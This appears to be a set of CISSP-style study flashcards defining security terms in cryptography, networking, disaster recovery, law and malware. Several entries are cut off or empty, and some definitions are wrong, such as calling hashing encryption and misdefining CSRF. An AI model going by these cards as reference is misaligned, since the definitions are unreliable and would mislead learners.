Used to cryptographically sign documents. Provide nonrepudiation, including authentication of the identity and integrity of the data. ***Does not provide confidentiality***
Port Isolation
Used to ensure that individual systems cannot interact with other resources even if logically on the same subnet.
Couriers
Used to transfer media to and from offsite storage facility
Distance Vector Routing Protocols
Uses metrics to determine best route. i.e. hop count. Prone to routing loops where packets loop between two routers.
Covert Storage Channel
Uses shared storage, such as a temporary directory, to allow subjects to signal each other.
Encryption Keys in RAM
Usually exist in plaintext in RAM. May be recovered by "cold booting" a computer off a small OS installed
TCSEC Division A
Verified Protection, with a single class A1 (Verified Design). A1 contains everything class B3, plus additional controls.
Database Views
Views may be used to provide a constrained user interface
VLAN
Virtual LAN. Virtual Switch. Can take the place of switch for both Computer and Server LAN.
Boot sector virus
Virus that infects the boot sector of a PC. Loads upon system start
EAP-MD5
Weak form of EAP. It offers client → server authentication only. EAP-MD5 is also vulnerable to password cracking attacks
RAM & Virtual Memory
When RAM is full/nearly full The system will then swap process to virtual memory. Searches for idle processes so Impact is minimal
Entrapment
When law enforcement, persuades someone to commit a crime when the person otherwise had no intention to.
Storing Sensitive Information
When storing sensitive information; encrypt it. Encryption of data at rest ensures confidentiality. Chain of custody(physical security controls) are important in considering during transfer.
Kernel Mode(Supervisor Mode)
Where the kernel is. Allows low-level access to memory, CPU, disk, etc. Most trusted and powerful part of a system.
Layer 7 - Application
Where you interface with your computer application. Your Web browser, word processor, and instant messaging client exist
Polyinstantiation
allows two different objects to have the same. Database polyinstantiation means two rows have the same primary key, but different data.
WRT
Work Recovery Time describes the time required to configure a recovered system
Call Tree
Work around To congestion on phonelines during disaster.
Right to Audit
Written approval on behalf of organization being audited to allow the third part to commence the audit.
Macrovirus
Written in macro language (Microsoft office, excel)
Honeynets
a (real or simulated) network of honeypots. oneynets involve an entire network of systems and services that lack any legitimate devices
DLP
a class of solutions that are tasked specifically with trying to detect or, preferably, prevent data from leaving an organization in an unauthorized manner.
Solid State Drives
a combination of flash memory and DRAM. Degaussing has no effect. SSD's have logical blocks and are mapped to physical blocks
Password Control
a concern for management as well as the IT security professional. Written down, etc.
Key Escrow
a copy of the key is retained by the third-party organization(sometimes multiple...)
Cipher
a cryptographic algorithm
Integrated Product Team
a customer-focused group that focuses on the entire lifecycle of a project
Systems Development Life Cycle
a development model that focuses on security in every phase
Authenticator
a device such as an access point that allows a supplicant to authenticate and connect
Programmable Logic Device (PLD)
a field-programmable device, which means it is programmed after it leaves the factory. EPROMS, EEPROMS, and Flash Memory are all examples.
Acceptance Testing(ISTQB)
a formal testing with respect to user needs, requirements, and business processes conducted to determine whether or not a system satisfies the acceptance criteria and to enable the user, customers or other authorized entity to determine whether or not to accept the system."
Internet
a global collection of peered networks running TCP/IP, providing best effort service
Message Authentication Code(MAC)
a hash function that uses a key. A common MAC implementation is Cipher Block Chaining Message Authentication Code(CBC-MAC) eg: uses DES
Policy
a high-level management directive. Policy is mandatory. It does not delve into specifics. i.e. A company's sexual harassment policy.
Foreign Key
a key in a related database that matches a primary key in a parent database table.
Hot site
a location that an organization may relocate to following a major disruption or disaster. It is a datacenter with a raised floor, power, utilities, computer peripherals, and fully configured computers.
Assembly language
a low-level computer programming language. "SUB" "ADD," "JMP"
Aggregation
a mathematical attack where an attacker aggregates details at a lower classification to determine information at a higher classification
State Machine Model
a mathematical model that groups all possible system occurrences, called states. 'States' are evaluated and overall systems are proven to be secure upon close of evaluation.
Aggregation
a mathematical process: a user asks every question, receives every answer, and derives restricted information.
Dumpster Diving
a physical attack which a person recovers trash in hopes of finding sensitive information.
Topography
a physical shape of the land: hills, valley, trees, etc. High secure sites will leverage topology, eg: Military.
Continuity of Operations Plan
a plan to maintain operations during a disaster.
Tuple
a row, entry in a relational database table.
Disaster Recovery Plan
a short-term plan to recover from a disruptive event
Backdoor
a shortcut in a system that allows a user to bypass security checks.(skipping username/password authentication.)
Bayesian Filtering
a simple mathematical formula used for calculating conditional probabilities. Modern application to identify spam
Spiral Model
a software development model designed to control risk
Database
a structured collection of related data. Databases allow queries (searches), insertions (updates), deletions, and many other functions.
Honeypots
a system designed to attract attackers. Internal honeypots can provide high-value warnings of internal malware or attackers. Consult with legal staff before deploying a honeypot
Polymorphic virus
a virus that changes its signature upon infection of a new system, attempting to evade signature based antivirus software
Vulnerability
a weakness in a system
NDA
a work-related contractual agreement that ensures that, prior to being given access to sensitive information or data, an individual or organization appreciates their legal responsibility to maintain the confidentiality of that sensitive information.
Authorization
actions authenticated subjects are allowed to perform on a system
MAC Address
address is the unique hardware address of an Ethernet network interface card (NIC), typically "burned in". 48-bit and 64 bit(EUI-64)
Privilege escalation
allow an attacker with (typically limited) access to be able to access additional resources
Network Model(People)
allows branches of a hierarchical database to have two parents. Ex: Organization's hierarchy.
European Union(EU) Privacy Directive
allows for the free flow of information while still maintaining consistent protection of each member nation's citizens' data
DHCP
allows more configuration options, as well as assigning temporary IP address leases to systems
Salt
allows one password to hash multiple ways. Some systems (like modern UNIX/Linux systems) combine a salt with a password before hashing
Data Analytics
allows organization to better understand the typical use cases and a baseline of what constitutes typical or normal interaction with the data base.
Lattice-Based Access Controls
allows security controls for complex environments. there are defined upper and lower access limits implemented by the system. Allows reaching of higher and lower data classification, depending on the needs of the customer. Subjects have a Least Upper Bound and Greatest Lower Bound
Pivot
allows the attacker to establish a foothold 'behind enemy lines' (behind the firewall) and surf to internal websites, etc. Horizontal escalation is a form of pivoting. Non-privileged user to another Non-privileged.
Gateway-to-gateway(IPsec)
also called point-to-point) connects two IPsec gateways
The Operational Acceptance test
also known as Production acceptance test validates whether the system meets the requirements for operation.
Due Diligence
always meeting or exceeding the requirements for protection of assets. prudent in investigation of potential threats.
Extreme Programming(XP)
an Agile development method that uses pairs of programmers who work off a detailed specification
Nonrepudiation
an assurance that a specific user performed a specific transaction and that the user performed a specific transaction. Cannot repediate(deny)
Password guessing
an online technique that involves attempting to authenticate a particular user to the system
Common Object Request Broker Architecture
an open vendor-neutral networked object broker framework by the Object Management Group. Competes with Microsoft DCOM.
End User License Agreements(EULA's)
an unusual form of contract because using software typically constitutes contractual agreement.
Subject
and active entity on an information system
Covert channel
any communication that violates a security policy. Used by malware installed on a system that locates.
Disaster
any disruptive event that interrupts normal system operations
Hybrid Attacks
appends, prepends, or changes characters in words from a dictionary before hashing, to attempt the fastest crack of complex passwords. For complex passwords. Example: Replaces each letter "o" with the number "0"
Triple DES
applies single DES encryption three time per block. Formally called "TDEA" Held up well after years of cryptanalysis. Primary weakness is that is it slow. Encrypt, Decrypt, Encrypt. Three unique keys 1TDES EDE, 2 TDES EDE, 3TDES EDE.
Reciprocal agreements
are a bi-directional agreement between two organizations in which one organization promises another organization that it can move in and share space if it experiences a disaster.
Maintenance hooks
are a type of backdoor they are shortcuts installed by designers and programmers to allow developers to bypass normal system checks during development.
Fourth-generation programming languages (4GL)
are computer languages that are designed to increase programmer's efficiency by automating the creation of computer programming code.
DRP Review
basic form of initial DRP testing, and is focused on simply reading the DRP in its entirety to ensure completeness of coverage.
Respond
begins the process of assessing the damage
Combinatorial software testing
black-box testing method that seeks to identify and test all unique combinations of software inputs
Physical Countermeasures
building, office security, locks, security guards, mobile device encryption.
DHCPv6
called "stateful autoconfiguration
Corrosion
can be caused by High Humidity Levels
VLAN
can be though of as a virtual switch. Act as both a computer switch and a server switch. FF:FF:FF:FF:FF:FF traffic will reach all computers but not servers.
Credential Management Systems
can help harden user credentials in meaningful ways.
Object-Oriented Programming
changes the older procedural programming methodology, and treats a program as a series of connected objects that communicate via messages
Organization for Economic Cooperation and Development (OECD)
consists of 30 member nations from around the world. Provide a basic framework for the protections that should be afforded of personal data.
Botnet
contains a central command and control network, managed by humans called bot herders. Term zombie is used to describe a bot. Many use IRC
Take-Grant Protection Model
contains rules that govern the interactions between subjects and object, and permissions subjects can grant to other subjects. Rules include: take, grant, create, and remove
Hypervisor
controls access between virtual guests and host. Type 1 Hypervisor(bare metal) is part of an operating system that runs directly on host hardware, VMware ESX. Type 2 Hypervisor runs an application on a normal operating system.
Encryption
converts plaintext to ciphertext
Data Controllers
create and manage sensitive data within and organization. HR employees are often data controllers.
Genetic programming
creates random programs and assigns them a task of solving a problem. The fitness function describes how well they perform their task
Utility Reliability
critical for site selection. Protecting against outages and failures is key.
Digital forensics
dealing with investigations and evidence with special consideration of the legal aspects of this process
Standards
describe the specific use of technology. Often applied to hardware. Standards are mandatory. They lower the Total Cost of Ownership(TCO)
Work Factor
describes how long it will take to break a cryptosystem.
Mean Time to Repair
describes how long it will take to recover a failed system
Throughput
describes the process of authenticating to a biometric system., A typical throughput is 6-10 seconds
Layer 1 - Physical
describes units of data such as bits represented by energy
Scope(Policy)
describes what systems, people, facilities, and organizations are covered by the policy.
Network Model
description of how a network protocol suite operates. OSI Model
Chinese Wall Model
designed to avoid conflicts of interest by prohibiting one person, such as a consultant, from accessing multiple conflict of interest categories (CoIs)
Analog
designed to carry the human voice. A vinyl record is analog
Diameter
designed to provide an improved Authentication, Authorization, and Accounting (AAA) framework. Diameter uses a single server to manage policies for many services, as opposed to RADIUS that requires many servers to handle all of the secure connection
Duress Warning Systems
designed to provide immediate alerts to personnel in the event of emergencies. violence, weather, chemical contamination. i.e. Speaker Systems
Destruction
destructive methods include: incineration, pulverizing, shredding, and bathing metal components in acid.
BRP
details the steps required to restore normal business operations after recovering from a disruptive event
Closed Circuit Television (CCTV)
detective device used to aid guards in detecting the presence of intruders in restricted areas. Key issues include depth of field (the area that is in focus) and field of view (the entire area viewed by the camera). Pan and Tilt. Backed up my magnetic tape
Least Privelage
dictates that persons have no more than the access that is strictly required for the performance of their duties. Least Privelage is a form of Discretionary Access Control (DAC)
Static
discharges to balance a positive and negative electrical imbalance. Can cause damage to systems. Mitigated by proper humidity
Confidential
disclosure could cause damage to national security.
Top Secret
disclosure could cause exceptionally grave damage to national security.
Secret
disclosure could cause serious damage to national security.
Communicate
disseminating details regarding the organization's recovery status
Formal Access Approval
documented approval from the data owner for a subject to access certain objects. Requires subject understand all rules regarding access, consequences should data become lost, destroyed or compromised
Erase Operation
does not overwrite blocks. Data is written to flash on a page level and a page must be completely erased before it can be written to again.
Due Care
doing what a reasonable person would do. The "prudent man" rule. i.e Parents have a duty to care for their children. Due diligence is management of due care.
Asymmetric Encryption
encryption that uses two keys: if you encrypt with one you may decrypt with the other.
Full Disk Encryption (FDE)
encrypts an entire disk. This is superior to partially encrypted solutions, such as encrypted volumes, directories, folders or files
Emanations
energy that escapes an electronic system
Asset Tracking
enhance physical security. Asset tracking databases support regulatory compliance by identifying where data is.
Availability
ensure that information is available when needed
Safety Warden
ensures that all personnel safely evacuate the building in the event of an emergency or drill.
Full disk encryption
ensures the confidentiality of mobile device data. Superior to partially encrypted solutions.
Layer 3 - Network
escribes routing: moving data from a system on one LAN to a system on another. IP Address
Program Policy
establishes an organizations information security program.
Anomaly Detection
establishing a baseline of normal traffic. Alerting on abnormal network activity. Can detect new attacks
Exigent circumstances
evidence regarding an immediate threat to human life or of evidence being destroyed.
Security Incident
exists if the events suggest that violation of an organization's security posture has or is likely to occur.
Grey hat hackers
fall between the black and white hat hackers. Acts without malicious intent. The goal of a gray hat is to improve system and network security.
Static Random Access Memory (SRAM)
fast, expensive memory that uses small latches called "flip flops" to store bits. Maintains integrity as long as power is supplied.
3 Types of Backups
full backup, incremental backup and differential backup.
White box software testing
gives the tester access to program source code, data structures, variables, etc
Black box testing
gives the tester no internal details: the software is treated as a black box that receives inputs
Simulation Test/Walkthrough Drill
goes beyond talking about the process and actually has teams to carry out the recovery process.
Layer 2 - Data Link
handles access to the physical layer as well as local area network communication
Layer 4 - Transport
handles packet sequencing, flow control, and error detection. TCP and UDP are Layer 4 (Maintenance)
"Bad" blocks/clusters/sectors
hard disks routinely end up with sectors that cannot be read due to some physical defect. The sectors marked as bad will be ignored by the operating system since no data could be read in those defective portions
Coaxial
has an inner copper core("D") separated by an insulator("C"), plastic outer("A"
Wet pipes
have water right up to the sprinkler heads. Bulbs come in different colors rated for different temperatures
Hand Geometry
he devices use a simple concept of measuring and recording the length, width, thickness, and surface area of an individual's hand
Perimeter Defenses
help prevent, detect, and correct unauthorized physical access. Ideal qualities; safe, prevents ingress, authentication and accountability.
Stealth virus
hides itself from the OS and other protective software, such as antivirus software
Accountability
holds users accountable for their actions
Octets 2,3,4
host
IPsec Architectures
host-to-gateway, gateway-to-gateway, and host-to-host.
Service Level Agreements (SLA)
identifies key expectations that the vendor is contractually required to meet. Primarily address availability
Sashimi Model
ighly overlapping steps; it can be thought of as a real-world successor to the Waterfall Model. named after the Japanese delicacy Sashimi, which has overlapping layers of fish.
Data Remanence
important to media sanitization and data destruction. Could refer to residual data that persists on magnetic storage.
Responsibilities(Policy)
include responsibilities of information security staff, policy and managements teams, as well as responsibilities of all members of the organization.
Federal Interest Computer
includes government, critical infrastructure, or financial processing system.
Live forensics
includes taking a bit by bit, or binary image of physical memory, gathering details about running processes, and gathering network connection data.
Striping
increasing the read and write performance by spreading data across multiple hard disks
pLagUe{USA}
injects viruses into autorun.inf
Insiders
insider attack is launched by an internal user who may be authorized to use the system that is attacked.
Bytecode
intermediary form (converted from source code), but still must be converted into machine code before it may run on the CPU. Platform-independent code
Parallel Processing
involve recovery of critical processing components at an alternate computing facility,
Synthetic Transactions
involves building scripts or tools that simulate activities normally performed in an application. Ensure the application is still performing as expected
Mitigation
involves the process of understanding the cause of the incident so that the system can be reliably cleaned and ultimately restored to operational status later in the recovery phase.
Extranet
is a connection between private Intranets, such as connections to business partner Intranets
Free software
is a controversial term that is defined differently by different groups.
Kerberos
is a third-party authentication service that may be used to support Single Sign-On. AAA systems: authentication, authorization, and accountability. Main parts; represent the client, the KDC, and the server
Freeware
is free of charge to use
Outsourcing
is the use of a third party to provide Information Technology support services that were previously performed in-house. Enhances the information technology resources.
Certificate Authorities(CA)
issues digital certificates. May be private or public(VeriSign)
Rotation of Duties
job rotation or rotation of responsibilities, provides an organization with a means to help mitigate the risk associated with any one individual having too many privileges
Server-side attacks(service side)
launched directly from and attacker to a listening service. The "Conficker" worm of 2008 spread via a number of methods. TCP port 445 and exploiting a weakness in RPC. Patching, system hardening, firewalls, and other forms of defense in depth.
Criminal Law
laws where the victim can be seen as society itself. To maintain and orderly and law abiding citizenry. Goal is deter crime and punish offenders.
Network Attacks
leverage client-side attacks, server-side attacks, or Web application attacks
Public Key Infrastructure(PKI)
leverages all three forms of encryption to provide and manage digital certificates. Standard digital certificate format for PKI is x.509
CSRF
leverages third-party redirect of static content within the security context of a trusted site.
Modular Math
lies behind much of cryptography. Simply put, modular, math shows you what remains (the remainder) after division. Called "clock math"
Certificate Revocation List(CRL)
lists certificates that have been revoked.
Payment Card Industry Data Security Standard (PCI-DSS)
major vendors in payment card portion of the financial industry. Ensure better protection of cardholder data through mandating security policy, security devices, control techniques, and monitoring of systems of cardholder data.
Static NAT
makes a one-to-one translation between addresses
Zero-Day Exploits
malicious code for which there is not existing vendor-supplied patch.
Logic Bomb
malicious program that is triggered when a logical condition is met. Such as after a number of transactions have been process, or on a specific date/time.
Computer viruses
malware that does not spread automatically: require catalyst(human)
Trojan
malware that performs two functions. One benign(obfuscation), one malicious.
Worms
malware that self-propagates
Data processors
manage data on behalf of data controllers. An outsourced payroll company is an example of a data processor.
Layer 5 - Session
manages sessions, which provide maintenance on connections. (Maintenance)
Harrison- Ruzzo-Ullman Model
maps subjects, objects, and access right to an access matrix. It is considered a variation to the Graham-Denning Model. 6 Primitive Operations: Create Object Create Subject Destroy Subject Destroy Object Enter right into access matrix Delete right from access matrix
Biometrics
may be used to establish an identity, or to authenticate (prove an identity claim) Eg: Airport Facial Recognition
Packet Switched Networks
may use Quality of Service (QoS) to give specific traffic precedence over other traffic. QoS is often applied to Voice Over IP (VoIP). Avoids Interruption
Entity integrity
means each tuple has a unique primary key that is not null.
Convergence
means that all routers on a network agree on the state of routing
Dedicated(Mode of Operation)
means that the system contains objects of one classification label. Subjects must have equivalent clearance as objects. All subjects must possess a clearance equal to or greater than the label of objects.
Parity
means to achieve data redundancy without incurring the same degree of cost as that of mirroring in terms of disk usage and write performance.
Voiceprint
measures the subject's tone of voice while stating a specific sentence or phrase
Configuration Item Identification
methodology for selecting and naming configuration items that need to be placed under CM
Database replication
mirrors a live database allowing simultaneous reads and writes to multiple replicated databases by clients
Technical Controls
mitigate infected mobile computers and devices.
Host-to-host(IPsec)
mode connects two systems (such as file servers) to each other via IPsec
Protocol Behavior IDS
models the way protocols should work, often by analyzing RFCs (Request for Comments) RFC 793 describes TCP flags
FRR preferred over FAR
most organizations would prefer to reject authentic subjects to accepting impostors
Clipper Chip
name of tech used in Escrowed Encryption Standard(EES), announced in 1993 by US Gov. Used Skipjack algorithm. Symmetric cipher that uses an 80 bit key. Originally a secret algorithm.
Network Stack
network protocol suite programmed in software or hardware
Baseband
networks that have one channel and can only send one signal at a time.
Ignorance of the Law
never an excuse for breaking the law.
Read Only Memory(ROM)
nonvolatile memory that maintains integrity after loss of power
Inference and Aggregation
occur when a user is able to use lower level access to learn restricted information.
Access aggregation
occurs as individual users gain more access to more systems
Reading Down
occurs when a subject reads an object at a lower sensitivity level. Ex: Top Secret subject reading Secret subject. Subject reads down; data flows up.
Metasploit
open source Penetration Testing Tool
Public Cloud Computing
outsources IT infrastructure, storage, or application to a 3rd provider. Cloud Computing provide Infrastructure as a Service(IaaS, eg: Linux Server Hosting), Software as a Service(SaaS, eg: Web Service Hosting), Platform as a Service(PaaS, eg: Web Mail).
Offshoring
outsourcing to another country. Can raise privacy and regulatory issues.
Frame Relay
packet-switched Layer 2 WAN protocol that provides no error recovery and focuses on speed
Administrative Countermeasures
policies, procedures, guidelines, standards.
Allocated space
portions of a disk partition that are marked as actively containing data
Unallocated space
portions of a disk partition that do not contain active data
Financial Damages: Statutory
prescribed by law, which can be awarded to the victim even if the victim incurred no actual loss or injury.
Separation of duties
prescribes that multiple people are required to complete critical or sensitive transactions
CO2
removing oxygen smothers fires
Configuration Monitoring
process for assessing or testing the level of compliance with the established baseline configuration and mechanisms for reporting on the configuration status of items placed under CM
Configuration Change Control
process for managing updates to the baseline configurations for the configuration items
Patch Management
process of managing software updates. All software has flaws or shortcomings that are not fully addressed in advance of being released
Protocol Governance
process of selecting the right method cipher and implementation of selecting the right method (cipher)
Brownout
prolonged low voltage
Generators
protect against electric failures. Designed to provide power for longer periods of times. Always place generators about potential flooding areas
Transport Mode
protects the IP data (layers 4-7) only, leaving the original IP headers unprotected. Both modes add extra IPsec headers
Secure Hardware Architecture must...
provide confidentiality, integrity, and availability for processes, data, users.
Circuit-switched networks
provide dedicated bandwidth to point-to-point connections, such as a T1. Dedicated to purpose is a drawback
Kerberos Strength
provide mutual authentication. Mitigates replay attacks.
Packers
provide runtime compression of executables
Software Change and Configuration Management
provides a framework for managing changes to software as it is developed, maintained, and eventually retired.
Network Tap
provides a way to "tap" into network traffic. NIDS. Can "fail open"
SubBytes
provides confusion by Substituting the bytes of the state according to a substitution table. 1. Take byte of state to be substituted "T" 2. T is hex 53 3. 5 on X Row, 3 on Y Column
Mix Columns
provides diffusion by mixing via finite field mathematics
Hash Function
provides encryption using an algorithm and no key. One-way hash functions. Plaintext changes to fixed message length. Weaknesses found in bot MD5 and SHA1
Full-Knowledge Test/ Crystal Box
provides internal information to the penetration tester, including network diagrams, policies and procedures, and sometimes reports from previous penetration testers
Zachman Framework for Enterprise Architecture
provides six frameworks for providing information security, asking what, how, where, who, when, and why, and mapping those frameworks across rules including planner, owner, designer, builder, programmer, and user.
Authentication
proving an identity claim
Virtual SAN
provisioning of virtualized storage
Asymmetric Encryption
public key, private key. Encrypt public, Decrypt private
Open source
publishes source code publicly. Ubuntu, Apache
MTBF
quantifies how long a new or repaired system will run before failing
Mean Time Between Failures
quantifies how long a new or repaired system will run on average before failing
Assurance correctness
range from E0(inadequate) to E6(formal model of security policy); Functionality rating range include TCSEC equivalent ratings(F-C1, F-C2, etc.)
Layer 2 Broadcast Traffic
reaches all nodes in a "broadcast domain."
Warm Site
readily accessible hardware and connectivity, but it will have to rely upon backup data in order to reconstitute a system after a disruption.
Benefits of Cloud
redueced upfront capital expenditure, reduced maintenance costs, robust levels of service, and overall operational cost savings.
Password cracking
refers to an offline technique in which the attacker has gained access to the password hashes or database
Keyboard dynamics
refers to how hard a person presses each key and the rhythm by which the keys are pressed
Static analysis
review the raw source code itself looking for evidence of known insecure practices, functions, libraries, or other characteristics having been used in the source code
Vulnerability scanning
scans a network or system for a list of predefined vulnerabilities such as system misconfiguration, outdated software, or a lack of patching.
Data mining
searches large amounts of data to determine patterns that would otherwise get lost in the noise. Credit card issuers are experts in Data mining. "X or more purchases, in Y time, in Z places.
Level 1 Cache
second fastest form of cached memory, located On the CPU itself
VPN
secure data sent via insecure networks such as the Internet.
Dynamic testing
security checks are performed while actually running or executing the code or application under review
Chaining
seeds the previous encrypted block into the next block to be encrypted. Destroying patterns in resulting ciphertext
Denial of Service(DoS) Attack
seeks to deny service(or availability) of a system
Database normalization
seeks to make the data in a database table logically concise, organized, and consistent.
Integrity
seeks to prevent unauthorized modification of information. In other words, integrity seeks to prevent unauthorized write access. Ensure data accuracy and completeness
System Integrity
seeks to protect a system, such as a Windows 2008 server operating system, such as a
Data Integrity
seeks to protect information against unauthorized modification
Ping
sends an ICMP Echo Request to a node and listens for an ICMP Echo Reply
Sensitive but Unclassified
sensitive data that is not a matter of national security
Time Multiplexing
shares system resources between mulitple process, each with a dedicated slice of time.
Electrical Fault
short and long-term interruption of power. Impact availability and integrity. Sudden loss of power can damage Disk
Backdoors
shortcuts in a system that allow a user to bypass security checks (such as username/password authentication) to log in
Common Law
significant emphasis on particular cases and judicial precedents as determinants of the laws. Typically legislative bodies tasked with the creation of new statutes and laws.
Deluge
similar to dry pipes, except the sprinkler heads are open and larger than dry pipe heads.
Machine code
software that is executed directly by the CPU
Hacktivist
someone who hacks for political reasons. Vietnamese DDos.
Monoalphabetic Cipher
specific letter is substituted for another
Kerberos Weakness
stores the keys of all principles(clients and servers) KDC and TGS are single points of failure.
Network Forensics
study of data in motion, with special focus on gathering evidence via a process that will support admission into court
Sequential Memory
such as tape, must sequentially read memory, beginning at offset zero, to the desired portion of memory, beginning at offset zero.
Button locks
susceptible to brute force and shoulder surfing
RC5, RC6
symmetric block cipher by RSA. Uses 32, 64, or 128 bit blocks. Key size ranges from zero to 2040 bits.
Blowfish and Twofish
symmetric block ciphers created by Bruce Schneier. Uses 32 through 448 bit keys to encrypt 64 bit blocks. Was a finalist
Redundant Systems
system availability is extremely important, then it might be prudent to have entire systems available in the inventory
Mandatory Access Control
system-enforced access control based on subject's clearances and object's labels
Dry pipe
systems also have closed sprinkler heads: the difference is the pipes are filled with compressed air
Redundant Hardware
systems or devices that have redundant onboard power in the event of a power supply failure.
Recovery Controls
taken in order to restore functionality of the system and organization.
Hardware Segmentation
takes process isolation further by mapping process to specific locations
Spike
temporary high voltage
Sag
temporary low voltage
Preparation
teps taken before an incident occurs. Training, writing incident response policies
Teraflop
teraflop
Direct Evidence
testimony provided by a witness regarding what the witness actually experienced with her five senses.
Read-Through
testing lists all necessary components required for successful recovery, and ensures that they are, or will be, readily available should a disaster occur.
Acceptance Testing
testing to ensure the software meets the customer's operational requirements
Referential integrity
that every foreign key in a secondary table matches a primary key in the parent table
Accountability
the ability to audit a system and demonstrate the actions of subjects
Electronic Vaulting
the batch process of electronically transmitting data that is to be backed up on a routine, regularly scheduled time interval
Accreditation
the data owner's acceptance of the certification, and of the residual risk, which is required before the system is put into production.
Evaluation Assurance Level (EAL)
the evaluation score of the tested product or system
Business Impact Analysis (BIA)
the formal method for determining how a disruption to the IT system(s) of an organization will impact the organization's requirements, processes, and interdependencies with respect the business mission.
Walkthrough/Tabletop
the goal is to allow individuals who are knowledgeable about the systems and services targeted for recovery to thoroughly review the overall approach
Log Reviews
the goal is to review logs to ensure they can support information security as effectively as possible
Cold Site
the least expensive recovery solution to implement. It does not include backup copies of data, nor does it contain any immediately available hardware.
Zero-Knowledge Test.
the penetration tester begins with no external or trusted information
Confusion
the plaintext and ciphetext should e as confused or random as possible.
Response
the point at which the incident response team begins interacting with affected systems and attempts to keep further damage from occurring as a result of the incident
Mandatory Leave/Forced Vacation
the primary security considerations are similar to that addressed by rotation of duties. Forcing all employees to take leave can identify areas where depth of coverage is lacking
Tailoring
the process of customizing a standard for an organization. Begins with controls selection, continues with scoping, and finishes with the application of compensating controls.
System High
the system contains objects of mixed labels (e.g., confidential secret, and top secret.) All subjects must possess a clearance equal to or greater than the label of objects.
Certification
the system has been certified to meet the security requirements of the data owner.
Activate Team
the team that will be responsible for recovery needs to be activated.
Collusion
the term used for the two parties conspiring to undermine the security of the transaction
Total Cost of Ownership(TCO)
the total cost of a mitigating safeguard. TCO combines upfront costs plus annual cost of maintenance, staff hours, fees, etc.
Routing Protocol Goal
to automatically learn a network topology, and learn the best routes between all network points
Information Security Professional Mission
to balance the needs of confidentiality, integrity, and availability, and make trade-offs as needed.
High Availability
to decrease the recovery time of a system or network device so that the availability of the service is less impacted than would be by having to rebuild, reconfigure, or otherwise stand up a replacement system
Scoping
to define exactly what assets are protected by the plan (BCP), which emergency events this plan will be able to address, and finally determining the resources necessary to completely create and implement the plan
Vendor Governance
to ensure that a business is continually getting sufficient quality from it's 3rd Party Providers
Reconstitution
to successfully recover critical business operations either at primary or secondary site
Change Management
to understand, communicate, and document any changes with the primary goal of being able to understand, control, and avoid direct or indirect negative impact that the change might impose
Object Encapsulation
treats a process as a black box.
Twisted Pair Cabling
twisting them together dampens the magnetism making them less susceptible to EMI. Cable Category 1 through 6. Categories begin at Cat 3.
NIST Special Publication 80-128
uide for Security-Focused Configuration Management of Information Systems
Trademark dilution
unintentional attack in which the trademarked brand name is used to refer to the larger general class of products. i.e. Kleenex
Biometric controls
usable by all staff, or compensating controls must exist. Potential exchange of bodily fluid is a serious negative for any biometric control EG: Airport bathrooms no handles
Distance Vector Routing Protocols
use
Synchronous dynamic tokens
use time or counters to synchronize a displayed token code with the code expected by the authentication server. Eg: Citi Text code.
One-time passwords
used for a single authentication. They are very secure but difficult to manage
Initialization Vection
used in symmetric ciphers to ensure that the first encrypted block of data is random
Clipping levels
used to differentiate between malicious attacks and normal users accidentally mistyping their passwords. Define a minimum reporting threshold leve
Symmetric Encryption
uses one key to encrypt and decrypt. Usually shared out-of-band such as face-to-face. Also called "Secret key" encryption.
Closed System
uses only proprietary hardware or software.
Open System
uses open hardware and standards, using standard components from a variety of vendors. An IBM-compatible PC is an Open system.
Social Engineering
uses the human mind to bypass security controls.
Proprietary software
usually copyrighted and possibly patented
TTL field
very time a packet passes through a router, the router decrements the TTL field. Reaches 0, drops packet. ICMP Time Exceeded message to the clien
Multipartite
virus that spreads via multiple vectors
Random Access Memory(RAM)
volatile hardware memory that loses integrity after loss of power
SanDisk Secure Erase Command
when command is executed all blocks in the physical address space, whether they are currently or previously allocated to the logical space, are completely erased.
Differential
will back up any files that have been changed since the last full backup. EX: For Monday's differential backup, only those files that have been changed since Sunday's backup will be archived
Dry Powder
works by lowering temperature and smothering the fire, starving it of oxygen.
OWASP Enterprise Security API Toolkits
• Authentication • Access control • Input validation • Output encoding/escaping • Cryptography • Error handling and logging • Communication security • HTTP security • Security configuration
Applications
• Client requests and server responses • Usage information • Significant operational actions
Change Management Process
• Identifying a change • Proposing a change • Assessing the risk associated with the change • Testing the change • Scheduling the change • Notifying impacted parties of the change • Implementing the change • Reporting results of the change implementation Changes must be auditable
BCP/DRP Mistakes
• Lack of management support • Lack of business unit involvement • Lack of prioritization among critical staff • Improper (often overly narrow) scope • Inadequate telecommunications management • Inadequate supply chain management • Incomplete or inadequate crisis management plan • Lack of testing • Lack of training and awareness • Failure to keep the BCP/DRP plan up to date
Kerberos Components
• Principal: Client (user) or service • Realm: A logical Kerberos network • Ticket: Data that authenticates a principal's identity • Credentials: a ticket and a service key • KDC: Key Distribution Center, which authenticates principals • TGS: Ticket Granting Service • TGT: Ticket Granting Ticket • C/S: Client/Server, regarding communications between the two
Snort Active Response Rules
• Reset_dest: send TCP RST to destination • Reset_source: send TCP RST to source • Reset_both: send TCP RST to both the source and destination • Icmp_net: send ICMP network unreachable to source • Icmp_host: send ICMP host unreachable to source • Icmp_port: send ICMP port unreachable to source • Icmp_all: send ICMP network, host and port unreachable to source
Individual Participation Principle
1. Able to find out if an entity holds any of their personal info 2. Made aware of any personal information being held 3. Given a reason for any denials to account for personal data being held 4. Able to challenge the content of any personal data being held.
Best Evidence rule
Original documents are preferred over copies. conclusive, tangible objects are preferred over oral testimony.
Color of law
Acting under the guise of/on behalf of law enforcement. i.e. Information Security Proffessional acting under the Color of Law.
Computer as a Tool
Crimes where the computer is a central component enabling the commission of the crime. Compromising database server, leveraging computers to steal cardholders data.
Burden of Proof
Criminal: beyond reasonable doubt Civil: preponderance of the evidence
Copyright Act of 1976
Criteria to determine whether a use would be covered by the fair use doctrine: The purpose and style of excerpt, the nature of copyrighted work; the amount of conte
Evidence
Information Security Professionals should attempt to provide all evidence, regardless of whether that evidence proves or disproves the facts of the case.
***EXAM WARNING***
Keep all examples on the exam simply by determining whether they fall into the definition of a subject or an object.
Gross Negligence
Opposite of due care. Absence of due care. Legally important concept.
Collection Limitation Principle
Personal data collection should have limits, obtained in a lawful manner, and unless there is a compelling reason to the contrary.
Data Quality Principle
Personal data should be complete, accurate, and maintained in a fashion consistent with the purposes for the data collection.
Authentication
Proving and identity claim. You authenticate the identity claim by supplying information or objects only you would possess. i.e. Driver's License, Password
Risk
a matched threat and vulnerability
Safeguard
a measure taken to reduce risk
Threat
a potentially negative occurrence
Counterfeiting
attempting to pass off a product as if it were the original branded product.
Hearsay Evidence
